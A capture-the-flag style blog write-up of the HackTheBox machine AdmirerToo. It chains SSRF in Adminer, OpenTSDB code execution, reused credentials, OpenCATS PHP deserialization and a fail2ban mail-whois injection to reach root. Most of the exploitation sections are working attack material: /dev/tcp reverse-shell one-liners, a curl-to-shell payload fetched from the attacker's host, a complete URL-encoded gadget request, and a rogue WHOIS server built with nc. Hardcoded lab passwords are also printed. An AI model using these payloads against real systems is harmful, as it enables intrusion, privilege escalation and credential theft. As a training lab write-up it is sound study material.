02 Jun 2022 | Reading time: ~10 min

HackTheBox - AdmirerToo [Hard]

#Adminer #CVE-2020-35476 #CVE-2021-21311 #CVE-2021-25294 #CVE-2021-32749 #Linux #OpenCats #OpenTSDB #RCE #SSRF #authentication-bypass #credentials-reuse #exploit-chain #fail2ban #hardcoded-credentials #insecure-DB-grants #insecure-credentials #php-deserialization #port-forwarding #whois-spoofing #B2R #Hard


Table of contents

  1. Resolution summary
    1. Improved skills
    2. Used tools
  2. Information Gathering
  3. Enumeration
    1. Port 80 - HTTP (Apache httpd 2.4.38 ((Debian)))
    2. db.admirer-gallery.htb (Adminer 4.7.8)
  4. Exploitation
    1. Adminer 4.7.8 Server Side Request Forgery - CVE-2021-21311
    2. OpenTSDB 2.4.0 Remote Code Execution - CVE-2020-35476
      1. Known vulnerability for OpenTSDB 2.4.0:
  5. Lateral Movement to jennifer
    1. Local enumeration
  6. Privilege Escalation
    1. Local Enumeration
      1. Port 8080 - HTTP
      2. Enumerated other services
    2. OpenCATS PHP Object Injection to Arbitrary File Write - CVE-2021-25294
    3. RCE vulnerability in mailing action using mailutils (mail-whois)
  7. Trophy

Resolution summary

  • Web server enumeration allows to identify admirer-gallery.htb and subdomain enumeration allows to identify db.admirer-gallery.htb
  • db.admirer-gallery.htb is vulnerable to Server Side Request Forgery (CVE-2021-21311) and allows to scan and retrieve information from internal services, including OpenTSDB running on port 4242
  • OpenTSDB 2.4.0 is vulnerable to Remote Code Execution (CVE-2020-35476) but PoC does not work as it is, so further enumeration through service API is required to make it work and obtain a shell as opentsdb
  • Local enumeration reveals old MySQL credentials inside a configuration file that can be reused to escalate to jennifer
  • Local service enumeration reveals a local port 8080 that can be forwarded remotely using ssh and runs a version of OpenCats vulnerable to PHP Object Injection (CVE-2021-25294)
  • Local enumeration reveals other MySQL credentials that can be used to access opencats DB
  • Opencat login form cannot be bypassed and admin’s credentials extracted from the user table cannot be cracked, however cats user has full grants on cats_dev DB, allowing to overwrite admin credentials and login.
  • Local enuemration reveals that fail2ban is installed on the machine and is vulnerable to Remote Code Execution (CVE-2021-32749)
  • PHP Code Injection and fail2ban Remote Code Execution can be chained together in order to write an arbitrary whois.conf and trick the server into using our machine as whois server. Once contacted, a script can be sent able to trigger the RCE in fail2ban during the sending of the notification emails.

Improved skills

  • Exploit SSRF to enumerate and attack internal servers
  • Chain multiple vulnerabilities

Used tools

  • nmap
  • gobuster
  • Public PoC
  • ssh (port forwarding)
  • phpggc
  • nc

Information Gathering

Scanned all TCP ports:

$ sudo nmap -p- admirertoo.htb -sS -oN scan/all-tcp-ports.txt -v
22/tcp    open     ssh
80/tcp    open     http
4242/tcp  filtered vrml-multi-use
16010/tcp filtered unknown
16030/tcp filtered unknown

Enumerated open TCP ports:

└─$ sudo nmap -p22,80,4242,16010,16030 admirertoo.htb -sT -sV -sC -oN scan/open-tcp-ports.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 11:01 EDT
Nmap scan report for admirertoo.htb (
Host is up (0.036s latency).

22/tcp    open     ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:33:47:e6:5f:1f:2e:fd:45:a4:ee:6b:78:fb:c0:e4 (RSA)
|   256 4b:28:53:64:92:57:84:77:5f:8d:bf:af:d5:22:e1:10 (ECDSA)
|_  256 71:ee:8e:e5:98:ab:08:43:3b:86:29:57:23:26:e9:10 (ED25519)
80/tcp    open     http           Apache httpd 2.4.38 ((Debian))
|_http-title: Admirer
|_http-server-header: Apache/2.4.38 (Debian)
4242/tcp  closed   vrml-multi-use
16010/tcp filtered unknown
16030/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.78 seconds


Port 80 - HTTP (Apache httpd 2.4.38 ((Debian)))


Enumerated files and directories:

└─$ gobuster dir -u http://admirertoo.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -t 25
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://admirertoo.htb/
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/04/23 11:07:19 Starting gobuster in directory enumeration mode
/css                  (Status: 301) [Size: 365] [--> http://admirertoo.htb/css/]
/js                   (Status: 301) [Size: 364] [--> http://admirertoo.htb/js/] 
/img                  (Status: 301) [Size: 365] [--> http://admirertoo.htb/img/]
/fonts                (Status: 301) [Size: 367] [--> http://admirertoo.htb/fonts/]
/manual               (Status: 301) [Size: 368] [--> http://admirertoo.htb/manual/]

Discovered DNS admirer-gallery.htb:


VHOST enumeration:

└─$ gobuster vhost -u admirer-gallery.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:          http://admirer-gallery.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
2022/04/23 11:18:02 Starting gobuster in VHOST enumeration mode
Found: db.admirer-gallery.htb (Status: 200) [Size: 2569]

db.admirer-gallery.htb (Adminer 4.7.8)



Enumerated MySQL version:


Enumerated user credentials:


Found user credentials cached within the login page:



Adminer 4.7.8 Server Side Request Forgery - CVE-2021-21311


Commit that partially resolved the vulnerability:


Because SSRF is still present but responses cannot be viewed if not with response code 200, we can force a 301 Redirect in order to read server response.

Python script to accept requests on port 80 and redirect them to an arbitrary host with a 301:

Python script to accept requests on port 80 and redirect them to an arbitrary host with a 301

$ sudo python3 redirect.py 10099

Connection to the attacker server using Elasticsearch module:

Used the “unhide” feature from burpsuite

Used the “unhide” feature from burpsuite


OpenTSDB 2.4.0 Remote Code Execution - CVE-2020-35476

Enumerated internal port 4242:

$ sudo python3 redirect.py 10099



Enumerated OpenTSDB version:


$ sudo python2 redirect.py --port 10099

Known vulnerability for OpenTSDB 2.4.0:

OpenTSDB - A Distributed, Scalable Monitoring System

[Arbitrary Code Execution in net.opentsdb:opentsdb CVE-2020-35476 Snyk](https://security.snyk.io/vuln/SNYK-JAVA-NETOPENTSDB-1041751)

Exploited the SSRF to trigger the RCE on port 4242:


$ python2 redirect.py --port 10098 "[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
serving at port 10098 - - [24/Apr/2022 14:43:52] "GET / HTTP/1.0" 301 - - - [24/Apr/2022 14:43:52] "GET / HTTP/1.0" 301 -

No such name for 'metrics': 'sys.cpu.nice’

No such name for ‘metrics’: ‘sys.cpu.nice’

Enumerated available metrics trough API:

OpenTSDB - Get all metrics via http


└─$ python2 redirect.py --port 10099 ""

Took the existent PoC and fixed with the available metric:

$ python2 redirect.py --port 10098 '[33:system("touch/tmp/poc.txt")]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'

Reverse shell:


/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'
└─$ sudo python3 -m http.server 80
[sudo] password for kali: 
Serving HTTP on port 80 ( ... - - [24/Apr/2022 10:54:50] "GET / HTTP/1.1" 200 - - - [24/Apr/2022 10:56:33] "GET /rev.sh HTTP/1.1" 200 - - - [24/Apr/2022 10:57:33] "GET /rev.sh HTTP/1.1" 200 -
└─$ python2 redirect.py --port 10099 '[33:system("curl${IFS}|/bin/sh")]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'
serving at port 10099 - - [24/Apr/2022 10:56:33] "GET / HTTP/1.0" 301 - - - [24/Apr/2022 10:57:33] "GET / HTTP/1.0" 301 -
└─$ nc -nlvp 10100
listening on [any] 10100 ...
connect to [] from (UNKNOWN) [] 43194
bash: cannot set terminal process group (549): Inappropriate ioctl for device
bash: no job control in this shell
opentsdb@admirertoo:/$ id
uid=1000(opentsdb) gid=1000(opentsdb) groups=1000(opentsdb)

Lateral Movement to jennifer

Local enumeration

Enumerated users:

opentsdb@admirertoo:/$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/nonexistent:/bin/false

Enumerated open ports:

opentsdb@admirertoo:/tmp$ netstat -polentau
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name     Timer
tcp        0      0    *               LISTEN      0          15337      -                    off (0.00/0/0)
tcp        0      0*               LISTEN      105        16191      -                    off (0.00/0/0)
tcp        0      0*               LISTEN      0          14268      -                    off (0.00/0/0)
tcp        0      0          ESTABLISHED 33         876179     -                    keepalive (5420.82/0/0)
tcp        0    187        ESTABLISHED 1000       1090591    11229/bash           on (0.23/0/0)
tcp        0      0          ESTABLISHED 33         876148     -                    keepalive (5420.82/0/0)
tcp        0      0          ESTABLISHED 33         876635     -                    keepalive (5289.74/0/0)
tcp6       0      0         :::*                    LISTEN      1001       18331      -                    off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      0          15339      -                    off (0.00/0/0)
tcp6       0      0 :::16030                :::*                    LISTEN      1001       19459      -                    off (0.00/0/0)
tcp6       0      0         :::*                    LISTEN      1001       19448      -                    off (0.00/0/0)
tcp6       0      0          :::*                    LISTEN      1001       19416      -                    off (0.00/0/0)
tcp6       0      0 :::16010                :::*                    LISTEN      1001       18326      -                    off (0.00/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      0          15352      -                    off (0.00/0/0)
tcp6       0      0 :::4242                 :::*                    LISTEN      1000       21278      557/java             off (0.00/0/0)
tcp6       0      0         TIME_WAIT   0          0          -                    timewait (47.37/0/0)
tcp6       0      0         ESTABLISHED 1001       18332      -                    off (0.00/0/0)
tcp6       0      0         ESTABLISHED 1001       18301      -                    off (0.00/0/0)
tcp6       0      0         ESTABLISHED 1000       876860     557/java             keepalive (5420.82/0/0)
tcp6       0      0         ESTABLISHED 1001       20913      -                    keepalive (5682.30/0/0)
tcp6       0      0          ESTABLISHED 1001       19458      -                    off (0.00/0/0)
tcp6       0      0          ESTABLISHED 1001       20286      -                    off (0.00/0/0)
tcp6       0      0         ESTABLISHED 1001       20915      -                    off (0.00/0/0)
tcp6       0      0         ESTABLISHED 1000       876791     557/java             keepalive (5420.82/0/0)
tcp6       0      0         ESTABLISHED 1001       20909      -                    keepalive (5682.30/0/0)
tcp6       0      0          ESTABLISHED 1001       18300      -                    off (0.00/0/0)
tcp6       0      0         ESTABLISHED 1000       876636     557/java             keepalive (5289.74/0/0)
udp        0      0              ESTABLISHED 101        1104895    -                    off (0.00/0/0)
udp        0      0              ESTABLISHED 101        1105921    -                    off (0.00/0/0)

Found hardcoded credentials:

opentsdb@admirertoo:~$ grep -ri admirer_ro /var/www/adminer/
/var/www/adminer/plugins/data/servers.php:    'username' => 'admirer_ro',
opentsdb@admirertoo:~$ cat /var/www/adminer/plugins/data/servers.php
return [
  'localhost' => array(
//    'username' => 'admirer',
//    'pass'     => 'bQ3u7^AxzcB7qAsxE3',
// Read-only account for testing
    'username' => 'admirer_ro',
    'pass'     => '1w4nn4b3adm1r3d2!',
    'label'    => 'MySQL',
    'databases' => array(
      'admirer' => 'Admirer DB',

Log in as jennifer reusing known passwords:

opentsdb@admirertoo:~$ su jennifer
jennifer@admirertoo:/usr/share/opentsdb$ id
uid=1002(jennifer) gid=100(users) groups=100(users)
jennifer@admirertoo:/usr/share/opentsdb$ cat ~/user.txt 

Privilege Escalation

Local Enumeration

Port 8080 - HTTP

Forwarded port 8080:

└─$ ssh -L 1337:localhost:8080 jennifer@admirertoo.htb
The authenticity of host 'admirertoo.htb (' can't be established.
ED25519 key fingerprint is SHA256:6GHqCefcB0XKD8lrY40SKb5COmsxVdTiXV4NYplmxbY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'admirertoo.htb' (ED25519) to the list of known hosts.
jennifer@admirertoo.htb's password:
Linux admirertoo 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Feb 22 20:58:38 2022 from


Enumerated configuration file for DB credentials:

jennifer@admirertoo:/opt/opencats$ cat config.php | grep -i database
/* Database configuration. */
define('DATABASE_USER', 'cats');
define('DATABASE_PASS', 'adm1r3r0fc4ts');
define('DATABASE_HOST', 'localhost');
define('DATABASE_NAME', 'cats_dev');
 * core team. If this setting is enabled, no writing to the database will
/* If enabled, the US zipcode database is installed and the user can filter

Enumerated DB data:

jennifer@admirertoo:/opt/opencats$ mysql -u cats -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 134652
Server version: 10.3.31-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> ...
MariaDB [cats_dev]> show tables;
| Tables_in_cats_dev                   |
| access_level                         |
| activity                             |
| activity_type                        |
| tag                                  |
| user                                 |
| user_login                           |
| word_verification                    |
| xml_feed_submits                     |
| xml_feeds                            |
| zipcodes                             |
55 rows in set (0.001 sec)

MariaDB [cats_dev]> select user_name,password from user;
| user_name      | password                         |
| admin          | dfa2a420a4e48de6fe481c90e295fe97 |
| cats@rootadmin | cantlogin                        |
| jennifer       | f59f297aa82171cc860d76c390ce7f3e |
3 rows in set (0.000 sec)

Enumerated user privileges ni MySQL:

MariaDB [cats_dev]> show grants;
| Grants for cats@localhost                                                                                   |
| GRANT USAGE ON *.* TO `cats`@`localhost` IDENTIFIED BY PASSWORD '*6DB7C7C159FC2393785B54064E70FDB137F445B9' |
| GRANT ALL PRIVILEGES ON `cats_dev`.* TO `cats`@`localhost`                                                  |
2 rows in set (0.000 sec)

Updated every password (cracking hashes was not working):

└─$ echo -n maoutis | md5sum
6f2ae4978075eae54f9491744818d28d  -
MariaDB [cats_dev]> update user set password="6f2ae4978075eae54f9491744818d28d";

Logged in to opencats using self injected credentials:


Enumerated other services

jennifer@admirertoo:/opt/opencats$ systemctl list-units --type=service
UNIT                               LOAD   ACTIVE SUB     DESCRIPTION
apache2.service                    loaded active running The Apache HTTP Server
apache2@opencats.service           loaded active running The Apache HTTP Server
apparmor.service                   loaded active exited  Load AppArmor profiles
console-setup.service              loaded active exited  Set console font and keymap
cron.service                       loaded active running Regular background program processing daemon
dbus.service                       loaded active running D-Bus System Message Bus
fail2ban.service                   loaded active running Fail2Ban Service
getty@tty1.service                 loaded active running Getty on tty1
hbase.service                      loaded active running HBase
ifup@eth0.service                  loaded active exited  ifup for eth0
ifupdown-pre.service               loaded active exited  Helper to synchronize boot up for ifupdown
keyboard-setup.service             loaded active exited  Set the console keyboard layout
kmod-static-nodes.service          loaded active exited  Create list of required static device nodes for the curren
mariadb.service                    loaded active running MariaDB 10.3.31 database server
networking.service                 loaded active exited  Raise network interfaces
nftables.service                   loaded active exited  nftables
open-vm-tools.service              loaded active running Service for virtual machines hosted on VMware
opentsdb.service                   loaded active running LSB: Starts OpenTSDB TSD
php7.3-fpm.service                 loaded active running The PHP 7.3 FastCGI Process Manager
rsyslog.service                    loaded active running System Logging Service
ssh.service                        loaded active running OpenBSD Secure Shell server
systemd-journal-flush.service      loaded active exited  Flush Journal to Persistent Storage
systemd-journald.service           loaded active running Journal Service
systemd-logind.service             loaded active running Login Service
systemd-modules-load.service       loaded active exited  Load Kernel Modules
systemd-random-seed.service        loaded active exited  Load/Save Random Seed
systemd-remount-fs.service         loaded active exited  Remount Root and Kernel File Systems
systemd-sysctl.service             loaded active exited  Apply Kernel Variables
systemd-sysusers.service           loaded active exited  Create System Users
systemd-timesyncd.service          loaded active running Network Time Synchronization
systemd-tmpfiles-setup-dev.service loaded active exited  Create Static Device Nodes in /dev
systemd-tmpfiles-setup.service     loaded active exited  Create Volatile Files and Directories
systemd-udev-trigger.service       loaded active exited  udev Coldplug all Devices
systemd-udevd.service              loaded active running udev Kernel Device Manager
systemd-update-utmp.service        loaded active exited  Update UTMP about System Boot/Shutdown
systemd-user-sessions.service      loaded active exited  Permit User Sessions
user-runtime-dir@1002.service      loaded active exited  User Runtime Directory /run/user/1002
user@1002.service                  loaded active running User Manager for UID 1002
vgauth.service                     loaded active running Authentication service for virtual machines hosted on VMwa

LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.

39 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.

Enumerated fail2ban:

jennifer@admirertoo:/opt/opencats$ fail2ban-server -V
Fail2Ban v0.10.2

jennifer@admirertoo:/opt/opencats$ cat /etc/fail2ban/jail.local
ignoreip =
bantime = 60s
destemail = root@admirertoo.htb
sender = fail2ban@admirertoo.htb
sendername = Fail2ban
mta = mail
action = %(action_mwl)s

OpenCATS PHP Object Injection to Arbitrary File Write - CVE-2021-25294

OpenCATS Version

CVE-2021-25294 : OpenCATS through 0.9.5-3 unsafely deserializes index.php?m=activity requests, leading to remote code execution. This occ

OpenCATS PHP Object Injection to Arbitrary File Write

Generated the POP gadget like the PoC does:

└─$ echo 'this is a test' > /tmp/test.txt

└─$ phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/test.txt /tmp/test.txt


jennifer@admirertoo:/opt/opencats$ ls -al /dev/shm/test.txt 
-rw-r--r-- 1 devel devel 58 Apr 24 20:19 /dev/shm/test.txt
jennifer@admirertoo:/opt/opencats$ cat /dev/shm/test.txt 
[{"Expires":1,"Discard":false,"Value":"this is a test\n"}]

Enumerated devel group writable directories:

jennifer@admirertoo:~/test$ find / -group devel 2>/dev/null
jennifer@admirertoo:/tmp$ ls -al /usr/local/src/                                                                                                                                                                                            
total 8                                                                                                                                                                                                                                     
drwxrwxr-x  2 root devel 4096 Jul  7  2021 .                                                                                                                                                                                                
drwxr-xr-x 10 root root  4096 Jul  7  2021 ..

RCE vulnerability in mailing action using mailutils (mail-whois)

Build software better, together

Command mail from mailutils package used in mail actions like mail-whois can execute command if unescaped sequences (\n~) are available in “foreign” input (for instance in whois output). […] The ‘~!’ escape executes specified command and returns you to mail compose mode without altering your message. When used without arguments, it starts your login shell. The ‘~|’ escape pipes the message composed so far through the given shell command and replaces the message with the output the command produced. If the command produced no output, mail assumes that something went wrong and retains the old contents of your message. […] Which menas that as long as attacker can control stdin that goes to mail (from mailutils package) command - code execution could be achieved. Then - the interesting configuration file from fail2ban perspective is /etc/fail2ban/action.d/mail-whois.conf fragment: […] This strictly puts whois command output of banned IP address into email. So if attacker could **get control over whois output of his own IP address - code execution could be achieved (with root, which is more fun of course).

jennifer@admirertoo:/opt/opencats$ cat /etc/fail2ban/action.d/mail-whois.conf
actionban = printf %%b "Hi,\n
            The IP <ip> has just been banned by Fail2Ban after
            <failures> attempts against <name>.\n\n
            Here is more information about <ip> :\n
            Fail2Ban"|mail -s "[Fail2Ban] <name>: banned <ip> from <fq-hostname>" <dest>

To exploit the vulnerability we must have control on whois output. Luckly opencats run with devel privileges and is vulnerable to PHP Object Injectionm leading to arbitrary file write. Devel has write privileges on /usr/local/etc, a secondary directory for configuration files, and so he can write here an arbitrary whois.conf that can be used to exploit the RCE in fail2ban

jennifer@admirertoo:/opt/opencats$ ls -ald /usr/local/etc
drwxrwxr-x 2 root devel 4096 Jul  7  2021 /usr/local/etc

Because the PHP deserialization writes json, we need to craft a specific POP gadget to write a clean conf file:

└─$ echo '}]|. []' > /tmp/payload

└─$ phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf /tmp/payload

Exploited the PHP Object Injection and wrote the conf file:

GET /index.php?m=activity&parametersactivity%3AActivityDataGrid=a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A19%3A%22%7D%5D%7C.+%5B10.10.14.18%5D%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22%2Fusr%2Flocal%2Fetc%2Fwhois.conf%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CATS=rsiut3ufujk9etpjqesshnchfr
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
jennifer@admirertoo:~$ ls /usr/local/etc/
jennifer@admirertoo:~$ ls /usr/local/etc/
jennifer@admirertoo:~$ cat /usr/local/etc/whois.conf
[{"Expires":1,"Discard":false,"Value":"}]|. []\n"}]

Preparing and testing the WHOIS rogue server:

└─$ echo '~| bash -c "bash -i >& /dev/tcp/ 0>&1" &' > fail2ban-rev.sh

└─$ sudo nc -nvlkp 43 -c "cat fail2ban-rev.sh"
[sudo] password for kali:
listening on [any] 43 ...
connect to [] from (UNKNOWN) [] 52964
jennifer@admirertoo:~$ whois
~| bash -c "bash -i >& /dev/tcp/ 0>&1" &
fgets: Connection reset by peer

Now we can force fail2ban into banning our IP in order to send an email to root (with root privileges) containing out malicious payload and obtaining RCE.

Rogue WHOIS server:

└─$ sudo nc -nvlkp 43 -c "cat fail2ban-rev.sh"
[sudo] password for kali: 
listening on [any] 43 ...
connect to [] from (UNKNOWN) [] 52976

Attempting to get banned:

└─$ ssh jennifer@admirertoo.htb
ssh: connect to host admirertoo.htb port 22: Connection refused
└─$ ssh jennifer@admirertoo.htb
jennifer@admirertoo.htb's password: 
Permission denied, please try again.
jennifer@admirertoo.htb's password: 
Permission denied, please try again.
jennifer@admirertoo.htb's password: 
jennifer@admirertoo.htb: Permission denied (publickey,password).
└─$ ssh jennifer@admirertoo.htb
ssh: connect to host admirertoo.htb port 22: Connection refused

Reverse shell:

└─$ nc -nlvp 10099
listening on [any] 10099 ...
connect to [] from (UNKNOWN) [] 34928
bash: cannot set terminal process group (14620): Inappropriate ioctl for device
bash: no job control in this shell
root@admirertoo:/# id && cat ~/root.txt && hostname
id && cat ~/root.txt && hostname
uid=0(root) gid=0(root) groups=0(root)








root@admirertoo:/# cat /etc/shadow
cat /etc/shadow